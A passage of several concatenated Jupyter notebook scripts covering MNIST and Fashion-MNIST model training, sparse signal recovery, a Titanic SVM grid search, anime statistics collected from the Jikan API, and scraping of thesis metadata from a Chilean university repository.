label=name)\n axes[0, 1].plot(result[\"val_loss\"], label=name)\n axes[1, 0].plot(result[\"train_acc\"], label=name)\n axes[1, 1].plot(result[\"val_acc\"], label=name)\n\naxes[0, 0].set_title(\"Training Loss\")\naxes[0, 1].set_title(\"Validation Loss\")\naxes[1, 0].set_title(\"Training Accuracy\")\naxes[1, 1].set_title(\"Validation Accuracy\")\n\nfor ax in axes.flatten():\n ax.legend()\n ax.set_xlabel(\"Epoch\")\n\nplt.tight_layout()\nplt.show()\n\n\n\n# + [markdown] id=\"pnzbVY3L2ieH\"\n# # Making Predictions\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"AO3rP5h42hzA\" outputId=\"b3ea4f9b-78a7-47d7-9336-cba00879af69\"\ntest_data = pd.read_csv(\"test.csv\")\n\ntest_dataset = MNISTDataset(test_data, transform, mode=\"test\")\ntest_loader = DataLoader(test_dataset, batch_size=100, shuffle=False)\n\nfor name, result in results.items():\n model = result[\"model\"]\n predictions = []\n\n with torch.no_grad():\n for inputs, _ in test_loader:\n # Move the input data to the specified device\n inputs = inputs.to(device)\n # Get the model's output for the input data\n outputs = model(inputs)\n # Find the class with the highest probability (predicted class)\n _, preds = torch.max(outputs, 1)\n # Add the predicted classes to the predictions list\n predictions.extend(preds.cpu().numpy())\n\n submission = pd.DataFrame({\"ImageId\": list(range(1, len(predictions) + 1)), \"Label\": predictions})\n submission.to_csv(f\"{name}_submission.csv\", index=False)\n\n print(f\"Created {name}_submission.csv\")\n\n\n# + id=\"3iIv_ZtWrM9-\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"4e6ece33-07b2-4db9-a635-96b7a3054c03\"\n# !kaggle competitions submit -c digit-recognizer -f resnet18_submission.csv -m \"ResNet18 Submission\"\n# !kaggle competitions submit -c digit-recognizer -f LeNet5_submission.csv -m \"LeNet5 Submission\"\n","repo_name":"antoinebossan1/Codes-for-Kaggle-Competitions","sub_path":"Comparison-of-ResNet-18-and-LeNet-5-Models-for-MNIST-Image-Classification/Comparison_ResNet-18_LeNet-5 Models_MNIST.ipynb","file_name":"Comparison_ResNet-18_LeNet-5 Models_MNIST.ipynb","file_ext":"py","file_size_in_byte":15869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"41153506658","text":"import pandas as pd\nimport numpy as np\n\nraw = pd.read_csv('data/training.csv',index_col=0)\n\nfinal = pd.read_csv('cosine_similarity', index_col=0)\n\nraw.head()\n\nfinal.head()\n\nfinal.loc[39767]\n\nraw.loc[39767]\n\ndf = raw.join(final['output'], how = 'inner', on = raw.index).drop(columns ='key_0')\n\ndf.sort_values(by = ['output'])\n\n\n","repo_name":"DamielCowen/sentiment_analysis_short_questions","sub_path":"Results.ipynb","file_name":"Results.ipynb","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"17526940599","text":"# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 344} id=\"wUgPnQ_-G5mC\" outputId=\"dbf5bbb9-b6cc-4b7a-800a-c1af97c13437\"\n# !pip install numpy --upgrade\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"UtodD-kz4lib\" outputId=\"e5033b89-905f-4f72-f606-dd928d497841\"\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\ndef GenerateA(M,N):\n A = np.random.normal(0,1,(M,N))\n SumCol = np.linalg.norm(A,axis=0)\n Anormed = A / SumCol[np.newaxis,:]\n return Anormed\n\nprint(GenerateA(2,3))\n\ndef SparseX(N,s):\n x = np.zeros(N)\n index = np.array(range(N))\n index1 = np.random.choice(index,s, replace = False)\n for i in index1:\n p = random.randint(0,1)\n if p == 0:\n x[i] = np.random.uniform(-10,-1)\n else:\n x[i] = np.random.uniform(1,10)\n return x,np.ndarray.tolist(index1)\n\n\nprint(SparseX(5,2))\n\n\n\n\n# + id=\"uRBMEgzEYQkx\"\ndef least_square(A,y):\n out = np.dot(np.dot(np.linalg.inv(np.dot(np.transpose(A),A)),np.transpose(A)),y)\n #out = np.linalg.inv(np.dot(A.T, A)).dot(A.T).dot(y)\n return out\n\ndef omp(A,y):\n M = np.shape(A)[0]\n N = np.shape(A)[1]\n r = np.copy(y)\n x_k = np.zeros(N)\n indexSet = []\n err = np.linalg.norm(r)\n\n while err > 0.0001:\n lambdaK = np.argmax(np.abs(np.dot(np.transpose(A),r)))\n indexSet.append(lambdaK)\n\n DeltaK = A[:,indexSet]\n #print(DeltaK)\n #print(y)\n a_k = least_square(DeltaK,y)\n x_k[indexSet] = a_k\n\n r = y - np.dot(A,x_k)\n err = np.linalg.norm(r)\n #print(err)\n\n return x_k,indexSet\n\n# A = GenerateA(5,10)\n# x,index = SparseX(10,2)\n# print(\"A: \", A)\n# print(\"x: \", x)\n# print(index)\n# y = np.dot(A,x)\n\n# x_k, i = omp(A,y)\n\n\n\n# + id=\"cKT85dQ7gMLA\"\ndef NoiselessCase(N,s_size,mc_time):\n M = range(1,N)\n S = range(1,s_size)\n\n plot_recover = np.zeros((len(M),len(S)))\n plot_normalError = np.zeros((len(M),len(S)))\n for m in M:\n A = GenerateA(m,N)\n\n for s in S:\n \n\n rec_count = 0\n normal_error = 0\n\n for i in range(mc_time):\n x, sparseIndex = SparseX(N,s)\n y = np.dot(A,x)\n \n x_k, recIndex = omp(A,y) \n\n normal_error += np.linalg.norm(x-x_k)/np.linalg.norm(x)\n if len(sparseIndex) == len(recIndex):\n #print(recIndex,sparseIndex)\n if sorted(recIndex) == sorted(sparseIndex):\n rec_count+=1\n else:\n continue\n \n \n\n plot_recover[m-1,s-1] = rec_count/mc_time\n plot_normalError[m-1,s-1] = normal_error/mc_time\n\n return plot_recover,plot_normalError\n\n\n\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 683} id=\"kVzjudRh5q5p\" outputId=\"0dc5897d-594b-4153-ff49-dc80e3671de1\"\np, E = NoiselessCase(20,10,2000)\nFigure1 = plt.figure(figsize = (5,5))\nF1 = Figure1.add_subplot(1,1,1)\nESR = F1.imshow(p)\nplt.colorbar(ESR,pad = 0.2)\nF1.set_xlabel(\"smax\")\nF1.set_ylabel(\"M\")\nF1.title.set_text(\"probability of ESR\")\nplt.savefig('noiseless_20_ESR.png')\n\nFigure2 = plt.figure(figsize = (5,5))\nF2 = Figure2.add_subplot(1,1,1)\nE = F2.imshow(E)\nplt.colorbar(E,pad = 0.2)\nF2.set_xlabel(\"smax\")\nF2.set_ylabel(\"M\")\nF2.title.set_text(\"average Normalized Error\")\n\nplt.savefig('noiseless_20_Err.png')\n\n# + id=\"24tvj9YZWjPd\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 683} id=\"OrwFcMeRQzuL\" outputId=\"f81d7268-e006-4960-f2ee-e5b134b4b672\"\np, E = NoiselessCase(50,15,1500)\nFigure1 = plt.figure(figsize = (5,5))\nF1 = Figure1.add_subplot(1,1,1)\nESR = F1.imshow(p)\nplt.colorbar(ESR,pad = 0.2)\nF1.set_xlabel(\"smax\")\nF1.set_ylabel(\"M\")\nF1.title.set_text(\"probability of ESR\")\nplt.savefig('noiseless_50_ESR.png')\n\nFigure2 = plt.figure(figsize = (5,5))\nF2 = Figure2.add_subplot(1,1,1)\nE = F2.imshow(E)\nplt.colorbar(E,pad = 0.2)\nF2.set_xlabel(\"smax\")\nF2.set_ylabel(\"M\")\nF2.title.set_text(\"average Normalized Error\")\n\nplt.savefig('noiseless_50_Err.png')\n\n# + [markdown] id=\"qBWliAa778w0\"\n# ##Answer\n# As we can see from the ESR plot, when smax > M the plot sharply goes to zero, and when M is larger, the probability of each smax is larger, and the error is smaller.\n# And when the measurement goes larger the probability of exact match goes larger for bigger smaxs\n\n# + id=\"7Y-Ay3g1Q5MP\"\np, E = NoiselessCase(100,20,1000)\nFigure1 = plt.figure(figsize = (5,5))\nF1 = Figure1.add_subplot(1,1,1)\nESR = F1.imshow(p)\nplt.colorbar(ESR,pad = 0.2)\nF1.set_xlabel(\"smax\")\nF1.set_ylabel(\"M\")\nF1.title.set_text(\"probability of ESR\")\nplt.savefig('noiseless_100_ESR.png')\n\nFigure2 = plt.figure(figsize = (5,5))\nF2 = Figure2.add_subplot(1,1,1)\nE = F2.imshow(E)\nplt.colorbar(E,pad = 0.2)\nF2.set_xlabel(\"smax\")\nF2.set_ylabel(\"M\")\nF2.title.set_text(\"average Normalized Error\")\n\nplt.savefig('noiseless_100_Err.png')\n","repo_name":"leoqzm/ECE269","sub_path":"ECE269_Projects/HW/HW3/ECE269HW3PA.ipynb","file_name":"ECE269HW3PA.ipynb","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"73796878505","text":"# # Trabalho Final - Modelos de IA e Machine Learning\n#\n# ### Integrantes:\n#\n# ### 1) Jurandir Ventura - RM336634\n# ### 2) Marcelo Preto - RM336632\n# ### 3) Fabio Rizzi - RM336656\n# ### 4) Thiago Alexandre – RM336583\n\n# # Exercício 5.1\n#\n# Utilizando o exemplo visto com o SVM e o dataset Titanic faça um GridSearch para encontrar a melhor configuração de parâmetros, entre o tipo de Kernel, pré-processamento (StandardScalar e MinMaxScalar), Gamma e C.\n#\n# Qual foi a melhor configuração que você encontrou? Qual a melhor acurácia?\n#\n# Dica: \n#\n# - Observe a matriz de confusão para verificar se o classificar está conseguindo classificar dados das duas classes;\n# - Normalize os dados;\n\n#Importando as bibliotecas. Se houver algum erro, use \"pip install Libname\"\nimport pandas as pd\nimport seaborn as sb\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import GridSearchCV\n\n# +\n#Leitura do dataset .csv\n\n#Lembrar que a origem da dataset é uma variável.\n#Neste caso é proveniente da pasta de datasets do Github: https://github.com/fiapIA/modelos_de_ia_e_ml/data\n\ndataset = pd.read_csv('data/5.1_titanic/train.csv', sep=',', engine='python')\ndataset.head()\n\n# +\n# Analisando o tamanho do dataset\n\ndataset.shape\n\n# +\n# Visão geral dos dados (com DataType)\n\ndataset.info()\n\n# +\n# Verificaçõ se tem dados nulos / faltantes\n\ndataset.isnull().sum()\n# -\n\n# ## Analisando os dados podemos inferir que algumas colunas não agregam poder decisório ao classificador, são as colunas: PassengerId, Name, Ticket e Cabin. Vamos removê-las do nosso dataset.\n\n# +\n# Limpando o dataset\n\ntitanic_data = dataset.drop(['PassengerId','Name','Ticket','Cabin'], 1)\n\n# +\n# Função para ver a idade média de passageiros em cada Classe (1, 2 e 3).\n# Assim preencheremos os faltantes com a média (mean)\n\ntitanic_data.groupby(['Pclass'])['Age'].mean()\n\n\n# +\n#Função para preencher idade (Age), pois tem 177 dados faltantes.\n\ndef age_approx(cols):\n Age = cols[0]\n Pclass = cols[1]\n \n if pd.isnull(Age):\n if Pclass == 1:\n return 38 #baseado na média de idade de passageiros dessa classe\n elif Pclass == 2:\n return 29 #baseado na média de idade de passageiros dessa classe\n else:\n return 25 #baseado na média de idade de passageiros dessa classe\n else:\n return Age\n\ntitanic_data['Age'] = titanic_data[['Age', 'Pclass']].apply(age_approx, axis=1)\n\n# Verificação se resolveu a questão dos dados nulos / faltantes da coluna 'Age'\n\ntitanic_data.isnull().sum()\n\n# +\n# A coluna \"Embarked\" tem dois registros faltantes. Vamos remover essas duas linhas do dataset.\n\ntitanic_data.dropna(inplace=True)\ntitanic_data.shape\n\n# +\n# Verificação se dados foram removidos\n\ntitanic_data.isnull().sum()\n# -\n\n# ## Por fim, vamos transformar as colunas do tipo Object em numéricas utilizando a função get_dummies.\n\n# +\ngender = pd.get_dummies(titanic_data['Sex'],drop_first=True)\n\nembark_location = pd.get_dummies(titanic_data['Embarked'],drop_first=True)\n\ntitanic_data.drop(['Sex', 'Embarked'],axis=1,inplace=True)\n\ntitanic_dmy = pd.concat([titanic_data,gender,embark_location],axis=1)\ntitanic_dmy.head(15)\n# -\n\n# ## Análise da correlação:\n\nplt.figure(figsize=(20,7))\nsb.heatmap(titanic_dmy.corr(), annot = True)\n\n# ### 'Pclass' e 'Fare' apresentam correlação de -0,55 e 'Q' e 'S' de -0,5. Vamos remover 'Pclass' e 'Q' do nosso dataset. \n\ntitanic_dmy.drop(['Pclass'],axis=1,inplace=True)\ntitanic_dmy.drop(['Q'],axis=1,inplace=True)\n\n# ### Separamos a variável alvo das características\n\ny = titanic_dmy['Survived']\nX = titanic_dmy.drop('Survived', axis=1)\n\n# ### Criamos os pipelines para execução do classificador para cada tipo de Kernel e normalização.\n\n# +\npip_1 = Pipeline([\n ('min_max_scaler', MinMaxScaler()),\n ('clf', svm.SVC(kernel='rbf'))\n])\n\npip_2 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='rbf'))\n])\n\npip_3 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='poly'))\n])\n\npip_4 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='linear'))\n])\n\narr_pipelines = [pip_1, pip_2, pip_3, pip_4]\n# -\n\n# ### Executamos o cross-validation de cada um deles e verificamos qual possui a maior acurácia.\n\n# +\nindexAux = 0\n\nfor pip in arr_pipelines:\n resultados = cross_val_predict(pip, X, y, cv=5)\n indexAux += 1\n print ('pip_', indexAux, ' ==> ', metrics.accuracy_score(y,resultados))\n# -\n\n# ### A melhor acurácia foi de 0,826 do kernel RBF com StandardScaler. Próximo passo é utilizarmos o GridSearch para encontrarmos a melhor configuração de parâmetros para esse classificador.\n\n# +\nlista_C = [0.001, 0.01, 0.1, 1, 10,100]\nlista_gamma = [0.001, 0.01, 0.1, 1, 10, 100]\n\nparam_grid = dict(clf__C=lista_C, clf__gamma=lista_gamma)\n\ngrid = GridSearchCV(pip_2, param_grid, cv=5, scoring='accuracy', verbose = 1)\ngrid.fit(X, y)\n\nprint(\"Melhor C e Gamma ==> {}\".format(grid.best_params_))\nprint(\"Melhor Acurácia ==> {}\".format(grid.best_score_))\n# -\n\n# ### O melhor C é 1 e o melhor gamma 0.1 com acurácia de 0.824. Ou seja, nesse modelo, a acurácia é praticamente a mesma da execução sem o fitting dos parâmetros.\n\n# +\npip_5 = Pipeline([\n ('scaler',StandardScaler()),\n ('clf', svm.SVC(kernel='rbf',C=1,gamma=0.1))\n])\n\nresultados = cross_val_predict(pip_5, X, y, cv=5)\n\nprint(\"Acurácia: {}\".format(metrics.accuracy_score(y,resultados)))\nprint(metrics.classification_report(y,resultados,target_names=['0','1']))\n\n# +\n# Matriz de confusão:\n\nsb.heatmap(metrics.confusion_matrix(y, resultados), annot = True, fmt = \"d\")\n# -\n\n# ## O classificador consegue classificar dados das duas \"categorias\", quem sobreviveu e quem não sobreviveu.\n\n\n","repo_name":"JV-cloud/modelos_de_ia_e_ml","sub_path":"5.1.ipynb","file_name":"5.1.ipynb","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"7798130578","text":"# +\n# 统计用户的最近记录\n# 解决方式:\n# 双端队列\n# 实现一个猜数字的小游戏\n\nfrom random import randint\nfrom collections import deque\n\nN = randint(0,100)\nq = deque([],5)\n\ndef guess(k):\n q.append(k)\n if k == N:\n print('right')\n return True\n elif k < N:\n print('less than N')\n return False\n else:\n print('greater than N')\n return False\n\ndata = [randint(0,100) for _ in range(10)]\nprint(data)\nfor x in data:\n guess(x)\n print(q)\n\n \n# -\n\n\n","repo_name":"20130353/python_skill_set","sub_path":"双端队列.ipynb","file_name":"双端队列.ipynb","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"25872706011","text":"# # Get anime and manga stats from API\n\n# ### Imports\n\n# Imports\nimport requests\nimport csv\nfrom ratelimit import limits, sleep_and_retry, RateLimitException\nimport pandas as pd\nfrom backoff import on_exception, expo\nimport numpy as np\nimport time\n\n# ### List to store stats\n\n# +\n#Store anime stats\ndata_anime = { \n 'anime_id':[],\n 'watching' :[],\n 'completed':[],\n 'on_hold':[],\n 'dropped':[],\n 'plan_to_watch':[],\n 'total':[]\n}\n\n#Store manga stats\ndata_manga = { \n 'manga_id':[],\n 'reading' :[],\n 'completed':[],\n 'on_hold':[],\n 'dropped':[],\n 'plan_to_read':[],\n 'total':[]\n}\n\n\n# -\n\n# ### Rate Limter\n\n@sleep_and_retry\n@limits(calls = 1, period = 1)\ndef call_api(url):\n response = requests.get(url)\n\n print(url)\n\n if response.status_code != 200:\n return None\n\n return response\n\n\n# ### Get anime ID for top 500\n\n# +\ndf_anime = pd.read_csv(\"Dataset/anime.csv\")\n\ndf_anime.sort_values(by = ['score'], ascending=False, inplace = True)\n\ndf_anime = df_anime.head(500)\n\nanime = np.array_split(df_anime, 2)\n\n\n# -\n\n# ### Get anime data\n\ndef getAnime(i): \n for a in anime[i]['anime_id']:\n url = \"https://api.jikan.moe/v4/anime/\"+ str(a) +\"/statistics\"\n data = call_api(url)\n\n if(data == None):\n print(a)\n \n if(data != None):\n data = data.json()['data']\n\n data_anime['anime_id'].append(a)\n data_anime['watching'].append(data['watching'])\n data_anime['completed'].append(data['completed'])\n data_anime['on_hold'].append(data['on_hold'])\n data_anime['dropped'].append(data['dropped'])\n data_anime['plan_to_watch'].append(data['plan_to_watch'])\n data_anime['total'].append(data['total'])\n\n time.sleep(60)\n\n\ngetAnime(1)\n\n# ### Add to csv\n\ndf = pd.DataFrame(data_anime)\ndf.to_csv('Dataset/anime_stats.csv', index=False)\n\n# ### Get manga ID for top 500\n\n# +\ndf_manga = pd.read_csv(\"Dataset/manga.csv\")\n\ndf_manga.sort_values(by = ['score'], ascending=False, inplace = True)\n\ndf_manga = df_manga.head(500)\n\nmanga = np.array_split(df_manga, 10)\n\n\n# -\n\n# ### Get manga data\n\ndef getManga(i): \n for m in manga[i]['manga_id']:\n print(m)\n\n url = \"https://api.jikan.moe/v4/manga/\"+ str(m) +\"/statistics\"\n data = call_api(url)\n\n if(data == None):\n print(m)\n \n if(data != None):\n data = data.json()['data']\n \n data_manga['manga_id'].append(m)\n data_manga['reading'].append(data['reading'])\n data_manga['completed'].append(data['completed'])\n data_manga['on_hold'].append(data['on_hold'])\n data_manga['dropped'].append(data['dropped'])\n data_manga['plan_to_read'].append(data['plan_to_read'])\n data_manga['total'].append(data['total'])\n\n time.sleep(60)\n\n\ngetManga(0)\n\ngetManga(1)\n\ngetManga(2)\n\ngetManga(3)\n\ngetManga(4)\n\ngetManga(5)\n\ngetManga(6)\n\ngetManga(7)\n\ngetManga(8)\n\ngetManga(9)\n\n# ### Add to csv\n\ndf2 = pd.DataFrame(data_manga)\ndf2.to_csv('Dataset/manga_stats.csv', index=False)\n","repo_name":"Harman367/Anime-and-Manga-Data-Visualisation","sub_path":"get_API_data.ipynb","file_name":"get_API_data.ipynb","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"74053206505","text":"# + [markdown] id=\"UuBE0QQSyHJ3\"\n# # ENLACES DE LAS TESIS Y OBTENIENDO INFORMACIÓN DE UNA SOLA\n\n# + [markdown] id=\"x61ZZvpE9AnX\"\n# ## Tesis disponibles en la página 1\n\n# + id=\"-I3WpCFryq_X\"\nimport requests\nfrom bs4 import BeautifulSoup\n\n# + id=\"bt8z2Wy5pDAI\"\n#Universidad de Chile\nwebsite = \"https://repositorio.uchile.cl\"\nurl = \"https://repositorio.uchile.cl/discover?rpp=10&etal=0&group_by=none&page=1&filtertype_0=type&filter_relational_operator_0=equals&filter_0=Tesis\" #url tesis\n\n# + id=\"O64iDgTyyqfx\"\nresp = requests.get(url)\nsoup = BeautifulSoup(resp.text, \"html.parser\")\n\n# + id=\"acdHIr8kzhLd\"\ntesis = soup.find_all(class_=\"dosUch\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HO6pYOap1Cus\" outputId=\"58d14e19-d545-4973-9f73-3c2744edc149\"\nlista_tesis = []\nfor i in tesis:\n lista_tesis.append(website + f\"{i.find('a').get('href')}\")\n\nprint(lista_tesis)\n\n# + [markdown] id=\"VfEQUQ7g6veA\"\n# ## Información de una sola tesis\n\n# + id=\"5dsO1uqF60v3\"\nurl_tesis = \"https://repositorio.uchile.cl/handle/2250/189462\"\n\n# + id=\"wDBV0euT7i06\"\nresp = requests.get(url_tesis)\nsoup = BeautifulSoup(resp.text, \"html.parser\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"vW0s7o2P7ozq\" outputId=\"e3a0a258-0393-4aeb-f9fd-7287dd50480e\"\n#Insitución\n\"Universidad de Chile\"\n#Título tesis\nprint(soup.find(\"h2\").text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"TUroASKh8QoV\" outputId=\"3d8be4c8-e0cd-4773-ef01-39546c1d2476\"\n#Nombre del tesista\nprint(soup.find(itemprop = \"author\").text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"ttDzjDr_8-Uo\" outputId=\"19445375-eebe-4542-a71d-4120359413d3\"\n#Grado\na = soup.find(class_=\"simple-item-view-notadetesis\").find_all(\"div\")[1].text\nprint(a)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"BSm4gJ1nBHbo\" outputId=\"503b24a6-d196-4bda-bb49-8ed3b78d0aa4\"\n#Nombre del asesor(es)\na = soup.find_all(class_=\"simple-item-view-authors\", limit = 2)[1]\nfor i in a.find_all(itemprop=\"author\"):\n print(i.text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 36} id=\"AulPkU2c7uWY\" outputId=\"06ca25aa-eb8e-4cca-9c2a-c75dac2656f8\"\nb = []\nfor i in a.find_all(itemprop=\"author\"):\n b.append(i.text)\n\n\", \".join(b)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"1Y5ZN2ZyD7JG\" outputId=\"92276d10-a956-4bec-8437-8b0deebebc4b\"\n#Resumen\na = str(soup.find(class_ = \"simple-item-view-description\").find(itemprop = \"description\").find_all(text=True, recursive=False)[0])\nprint(type(a))\nprint(a)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 36} id=\"fQuMD97mE9SN\" outputId=\"a1288cc7-c290-49f3-b316-7457b908f200\"\n#Año\na = str(soup.find(class_=\"simple-item-view-date\").find_all(text=True, recursive=False)[1])\na\n\n# + [markdown] id=\"Vmghz1xR4DKj\"\n# # MUCHOS ENLANCES, TODAS LAS TESIS\n\n# + [markdown] id=\"OHKn0c9z-j_o\"\n# ## Eligiendo la cantidad de tesis:\n# Cada página contiene el enlace a 10 tesis.\n\n# + id=\"6OtHr-G8_RJz\"\nimport csv\n\n# + id=\"CFZB6SFL4FVF\"\nwebsite = \"https://repositorio.uchile.cl\"\nn = 5 #Número de páginas a scrapear\nlista_tesis = []\nfor i in range(1,n+1):\n url = f\"https://repositorio.uchile.cl/discover?rpp=10&etal=0&group_by=none&page={i}&filtertype_0=type&filter_relational_operator_0=equals&filter_0=Tesis\"\n resp = requests.get(url)\n soup = BeautifulSoup(resp.text, \"html.parser\")\n tesis = soup.find_all(class_=\"dosUch\")\n for i in tesis:\n lista_tesis.append(website + f\"{i.find('a').get('href')}\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Eq2He5jsBT-I\" outputId=\"67f8438c-bfda-4c24-b274-418b36081a88\"\nprint(lista_tesis)\n\n# + id=\"MYnMXeJb456Q\"\nwith open(\"Tesis.csv\", \"w\") as csv_file:\n escritor = csv.writer(csv_file, delimiter=\",\")\n escritor.writerow([\"Institución\",\"Título\",\"Autor\", \"Grado\", \"Asesor(es)\", \"Año\", \"Resumen\"])\n\nfor i in lista_tesis:\n resp_t = requests.get(i)\n soup_t = BeautifulSoup(resp_t.text, \"html.parser\")\n\n #Título\n try:\n titulo = soup_t.find(\"h2\").text\n except:\n titulo = \"\"\n\n #Autor\n try:\n autor = soup_t.find(itemprop = \"author\").text\n except:\n autor = \"\"\n\n #Grado\n try:\n g = soup_t.find(class_=\"simple-item-view-notadetesis\")\n if g != None:\n grado = g.find_all(\"div\")[1].text\n else:\n h = soup_t.find_all(class_=\"simple-item-view-description\")[1]\n if h != None:\n grado = h.find_all(\"div\")[1].text\n else:\n grado = \"\"\n except:\n grado = \"\"\n\n #Nombre del asesor(es)\n try:\n asesor = []\n a = soup_t.find_all(class_=\"simple-item-view-authors\", limit = 2)[1]\n for i in a.find_all(itemprop=\"author\"):\n asesor.append(i.text)\n asesor_f = \", \".join(asesor)\n except:\n asesor = []\n\n #Año\n try:\n año = str(soup_t.find(class_=\"simple-item-view-date\").find_all(text=True, recursive=False)[1])\n except:\n año = \"\"\n\n #Resumen\n try:\n b = soup_t.find(class_ = \"simple-item-view-description\")\n if b != None:\n if b.find(itemprop = \"description\") != None:\n resumen = str(b.find(itemprop = \"description\").find_all(text=True, recursive=False)[0])\n else:\n resumen = \"\"\n except:\n resumen = \"\"\n\n x = [\"Universidad de Chile\", titulo, autor, grado, asesor_f, año, resumen]\n with open(\"Tesis.csv\", \"a\") as csv_file:\n escritor = csv.writer(csv_file, delimiter=\",\")\n escritor.writerow(x)\n\n# + [markdown] id=\"ETG5vpWcApjh\"\n# ## Visualizando lo obtenido\n\n# + id=\"iTqNGolu6rHF\"\nimport pandas as pd\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} id=\"KJ6U7fD2Ig_7\" outputId=\"fb4aa295-0d4a-4e6d-aee5-9671115c1a75\"\npd = pd.read_csv(\"Tesis.csv\")\npd\n\n# + [markdown] id=\"2nLs3QqE--C4\"\n# ---\n\n# + [markdown] id=\"XfFiZunw-_eo\"\n# # ADICIONAL\n\n# + [markdown] id=\"qj75X_AbCI1a\"\n# ### Verificando que páginas no tienen una descripción.\n\n# + id=\"TGsy_2qT-9e-\"\nfor i in lista_tesis:\n resp_t = requests.get(i)\n soup_t = BeautifulSoup(resp_t.text, \"html.parser\")\n try:\n a = soup_t.find(class_ = \"simple-item-view-description\").find(itemprop = \"description\")\n if a != None:\n print(1)\n else:\n print(0)\n except:\n print(0)\n\n# + [markdown] id=\"332GavQ3C9Sv\"\n# ### Intentando obtener la descripción solo en español.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"ARAfTodv-9w4\" outputId=\"84400781-892c-4f26-b4eb-1042a1ef9265\"\nresp_t = requests.get(\"https://repositorio.uchile.cl/handle/2250/189462\")\n#resp_t = requests.get(\"https://repositorio.uchile.cl/handle/2250/189462\")\n\nsoup_t = BeautifulSoup(resp_t.text, \"html.parser\")\n\nb = soup_t.find(class_ = \"simple-item-view-description\")\n\nif b != None:\n if b.find(itemprop = \"description\") != None:\n resumen = str(b.find(itemprop = \"description\").find_all(text=True, recursive=False)[0])\n else:\n resumen = \"\"\nprint(resumen)\n\n# + [markdown] id=\"NgrB3-FaDa3N\"\n# ### Verificando la toma de grados para algunas tesis\n# Me doy cuenta que algunas páginas de las tesis, como la 44, no tienen la misma estructura que las demás. Así que procedemos a agregar esa consideración al código final.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"mVHmiBCRDWHe\" outputId=\"899ed20e-9972-4b8f-cf49-c753f45ce161\"\nresp_t = requests.get(\"https://repositorio.uchile.cl/handle/2250/148976\")\nsoup_t = BeautifulSoup(resp_t.text, \"html.parser\")\ng = soup_t.find(class_=\"simple-item-view-notadetesis\")\nh = soup_t.find_all(class_=\"simple-item-view-description\")[1]\nif g != None:\n grado = g.find_all(\"div\")[1].text\nelif h != None:\n grado = h.find_all(\"div\")[1].text\nprint(grado)\n","repo_name":"BMaikel/TF_LP2","sub_path":"RepoExtra_Universidad_de_Chile.ipynb","file_name":"RepoExtra_Universidad_de_Chile.ipynb","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"72700651944","text":"# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 476} id=\"fJq1aidq-epc\" outputId=\"53d4371e-9a3d-4a2b-c7ca-ed0c9f7f87bc\"\n# %matplotlib inline\n# %config InlineBackend.figure_format = 'retina'\n\n# !pip install helper\n# !wget -c https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/intro-to-pytorch/helper.py\n\n\nimport helper\nfrom torch import nn, optim\n#pra usar função de ativação, log softmax, relu\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, utils\nimport torch\n\n#inferencia e validação\n\ntransform = transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5), (0.5)),\n ])\n\ntrainset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download = True, train= True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset,batch_size = 64, shuffle = True)\n\ntestset = datasets.FashionMNIST('~/.pytorch/F_MNIST_data/', download = True, train=False,transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)\n\n#Definindo a arquitetura da rede \nclass Classifier(nn.Module):\n def __init__(self):\n super().__init__()\n #quatro transformações lineares diferentes \n #3 camadas ocultas e uma camada de saída\n #primeira camada oculta tem 256 unidades \n self.fc1 = nn.Linear(784,256)\n #segunda camada oculta tem 128 unidades \n 